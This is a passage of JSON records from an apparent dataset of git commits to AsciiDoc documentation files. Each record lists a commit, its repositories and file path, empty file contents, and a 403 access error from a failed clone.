file and switch to asciidoc\n","repos":"madmath\/sous-chef,madmath\/sous-chef,savoirfairelinux\/sous-chef,savoirfairelinux\/santropol-feast,savoirfairelinux\/santropol-feast,savoirfairelinux\/sous-chef,savoirfairelinux\/santropol-feast,madmath\/sous-chef,savoirfairelinux\/sous-chef","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/savoirfairelinux\/sous-chef.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c44eeded994e84c0f0cc7ea480e6fe8d24ef6500","subject":"add doc","message":"add doc\n","repos":"shaleh\/multinode-vagrant-devstack,shaleh\/multinode-vagrant-devstack,shaleh\/multinode-vagrant-devstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shaleh\/multinode-vagrant-devstack.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a823edff635d47397f6390396eb7ba4fe75c20f5","subject":"link to DocBook XSL parameter reference","message":"link to DocBook XSL parameter reference\n","repos":"azuwis\/asciidoctor-fopdf,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89e0ca392c5acd2d1122fdcc266789916a167962","subject":"Create README.adoc","message":"Create README.adoc","repos":"andreatta\/andreatta.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreatta\/andreatta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff58e77f3a2caac176eb859818acf1193bc3301b","subject":"Readded readme file","message":"Readded readme file\n","repos":"bensteinert\/chromarenderer-java,bensteinert\/chromarenderer-java","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bensteinert\/chromarenderer-java.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca7d5439a5ed88bffc2c50dcaeb1feca4423ff6f","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fa631bad4fff95eb74164b87b464448d98b80a2","subject":"Initial version of collections module documentation.","message":"Initial version of collections module documentation.\n","repos":"apache\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya","old_file":"src\/site\/asciidoc\/extensions\/mod_collections.adoc","new_file":"src\/site\/asciidoc\/extensions\/mod_collections.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb861de2c22347ffef5d0687424e0ec6e9c4897e","subject":"common GrailsApplicationForge snippet","message":"common GrailsApplicationForge snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-grailsApplicationForge.adoc","new_file":"src\/main\/docs\/common-grailsApplicationForge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a791cf085dce85f9d0f37e7cad47faeed393118d","subject":"doc: minor update to release notes","message":"doc: minor update to release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bdf3cd07be051511f8cc77e86d56f3da580434ee","subject":"add","message":"add\n\nSigned-off-by: Takeshi Banse <db42e37a7cb27ca6628f344993036144160b0931@laafc.net>\n","repos":"hchbaw\/en.zsh","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hchbaw\/en.zsh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2fba74dd7d0811361179e30ed6998693406a791a","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"4e6fdb906169fcafb52a7bde16f766ac3d431f4f","subject":"Fixed readme md","message":"Fixed readme md\n","repos":"rmuhamedgaliev\/MPI-lab1,rmuhamedgaliev\/MPI-lab1","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/MPI-lab1.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"420a16003239ff4b51524b1454dc2daaf8d37416","subject":"Fixed README","message":"Fixed README\n","repos":"rmuhamedgaliev\/MPI-lab2","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/MPI-lab2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7303d507f501cbe8aab05e3abcc0b706021361b6","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b74261f03e821143da032c64df7ea5999933f38","subject":"Table test page.","message":"Table test page.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/particle_emitters3.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/particle_emitters3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"26b2208b41652ce6b1653a0d3a0f61807b4bc905","subject":"Update 2016-06-17-Euro-Watching-Engineering.adoc","message":"Update 2016-06-17-Euro-Watching-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-17-Euro-Watching-Engineering.adoc","new_file":"_posts\/2016-06-17-Euro-Watching-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f0a2362cfd3bed48e59c517715edaadad1ce774","subject":"y2b create post Samsung Galaxy S9 Concept","message":"y2b create post Samsung Galaxy S9 Concept","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-22-Samsung-Galaxy-S9-Concept.adoc","new_file":"_posts\/2017-10-22-Samsung-Galaxy-S9-Concept.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"061899b40df9113a19230294f802d7eb1b7d0b54","subject":"Added a README for the RI","message":"Added a README for the RI","repos":"heiko-braun\/microprofile-health","old_file":"ri\/README.adoc","new_file":"ri\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heiko-braun\/microprofile-health.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"914664d89abc5036435a570cb125af66c0d6c6fc","subject":"Fix leftover reference to ScriptModule in native script docs","message":"Fix leftover reference to ScriptModule in native script docs\n","repos":"scottsom\/elasticsearch,yanjunh\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,nazarewk\/elasticsearch,jimczi\/elasticsearch,wuranbo\/elasticsearch,JSCooke\/elasticsearch,i-am-Nathan\/elasticsearch,MaineC\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,robin13\/elasticsearch,spiegela\/elasticsearch,MisterAndersen\/elasticsearch,alexshadow007\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,kalimatas\/elasticsearch,MaineC\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,elasticdog\/elasticsearch,LewayneNaidoo\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,fred84\/elasticsearch,jprante\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,fernandozhu\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,bawse\/elasticsearch,mikemccand\/elasticsearch,pozhidaevak\/elasticsearch,i-am-Nathan\/elasticsearch,rlugojr\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,i-am-Nathan\/elasticsearch,a2lin\/elasticsearch,rlugojr\/elasticsearch,mikemccand\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,njlawton\/elasticsearch,rlugojr\/elasticsearch,mikemccand\/elasticsearch,henakamaMSFT\/elasticsearch,MaineC\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,shreejay\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,geidies\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,MaineC\/elasticsearch,strapdata\/elassandra,geidies\/elasticsearch,scorpionvicky\/ela
sticsearch,alexshadow007\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,ZTE-PaaS\/elasticsearch,fred84\/elasticsearch,JackyMai\/elasticsearch,StefanGor\/elasticsearch,sneivandt\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,i-am-Nathan\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,elasticdog\/elasticsearch,bawse\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,kalimatas\/elasticsearch,spiegela\/elasticsearch,fforbeck\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,brandonkearby\/elasticsearch,jprante\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,yanjunh\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,nknize\/elasticsearch,yanjunh\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,spiegela\/elasticsearch,StefanGor\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,umeshdangat\/elasticsearch,obourgain\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,JackyMai\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,MisterAndersen\/elasticsearch,lks21c\/elasticsearch,vroyer\/elassandra,Helen-Zhao\/elasticsearch,naveenhooda2000\/elasticsearch,C-Bish\/elasticsearch,mortonsykes\/elasticsearch,kalimatas\/elasticsearch,JackyMai\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,henakamaMSFT\/elasticsearch,uschindler\/elasticsearch,artnowo\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,obourgain\/elasticsearch,lks21c\/elasticsearch,nilabhsagar\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,yanjunh\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elasticassandra,glefloch\/elasticsearch,nezirus\/elasticsearch,MaineC\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elasticassandra,C-Bish\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,shreejay\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,wuranbo\/elasticsearch,sneivandt\/elasticsearch,JSCooke\/elasticsearch,scorpionvicky\/elasticse
arch,uschindler\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,wuranbo\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,a2lin\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,wenpos\/elasticsearch,njlawton\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,winstonewert\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,glefloch\/elasticsearch,IanvsPoplicola\/elasticsearch,geidies\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,Shepard1212\/elasticsearch,fforbeck\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,HonzaKral\/elasticsearch,mortonsykes\/elasticsearch,nezirus\/elasticsearch,nazarewk\/elasticsearch,geidies\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,artnowo\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,alexshadow007\/elasticsearch,nilabhsagar\/elasticsearch,s1monw\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,winstonewert\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,JackyMai\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch","old_file":"docs\/reference\/modules\/scripting\/native.asciidoc","new_file":"docs\/reference\/modules\/scripting\/native.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01949addedf81819180c8abae06ddd978bf7dfa7","subject":"Update 2015-05-28-This-is-a-test.adoc","message":"Update 2015-05-28-This-is-a-test.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-05-28-This-is-a-test.adoc","new_file":"_posts\/2015-05-28-This-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"832abafc998b2260281600e537b5889882ba0f8f","subject":"Update 
2015-09-22-indian_lol_tvc.adoc","message":"Update 2015-09-22-indian_lol_tvc.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-22-indian_lol_tvc.adoc","new_file":"_posts\/2015-09-22-indian_lol_tvc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a1f678f449480d08f15433e33a49afd9bde21ad","subject":"Update 2015-04-29-V01-greater-avancement.adoc","message":"Update 2015-04-29-V01-greater-avancement.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-04-29-V01-greater-avancement.adoc","new_file":"_posts\/2015-04-29-V01-greater-avancement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5198ebc63bec4dec14583fc68102eb99586e6adf","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b776e6fde31ea42b33338b6143d561d7f09d3e00","subject":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","message":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d456d63889534fc55c97aad170439df0d47a2d69","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf5bf5854cf87d0780a250e1959f5c29d39bec70","subject":"Create do-accessible-fil.adoc","message":"Create do-accessible-fil.adoc\n\nFilipino translation for do-accessible.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"do-accessible-fil.adoc","new_file":"do-accessible-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"4152f8eb4d4c6d7bfe05dd4a3649f7f570d31c3e","subject":"update ConnectX-4 information","message":"update ConnectX-4 information\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3d05e804056c718db1b596106d2d60fa618e4e2","subject":"DBZ 1.5.0.Beta1 release announcement","message":"DBZ 1.5.0.Beta1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-02-24-debezium-1-5-beta1-released.adoc","new_file":"_posts\/2021-02-24-debezium-1-5-beta1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27e98f253029ab4aad7aab07d56fcc11d4f52f83","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce87aba0efb4dcd6e9e90bd1ca434e398eaf614a","subject":"Update 2017-02-13.adoc","message":"Update 2017-02-13.adoc","repos":"osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io,osada9000\/osada9000.github.io","old_file":"_posts\/2017-02-13.adoc","new_file":"_posts\/2017-02-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/osada9000\/osada9000.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e03e5ab3ba0b33bc4de4826a00ca1931b429056","subject":"Update 2015-07-13-Liebe.adoc","message":"Update 2015-07-13-Liebe.adoc","repos":"havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io","old_file":"_posts\/2015-07-13-Liebe.adoc","new_file":"_posts\/2015-07-13-Liebe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/havvazaman\/havvazaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41bdc27bc5cbad6b61c19278a52f6e1d4d700e37","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2175adf145fee406be1a9d9d62e3e20dbc5c334","subject":"[SPARK] document type conversion and push down","message":"[SPARK] document type conversion and push down\n","repos":"huangll\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d2d424ed6a3f6c61f16d426bcef2ec31eebd84c","subject":"y2b create post The iPhone Torture Chamber","message":"y2b create post The iPhone Torture 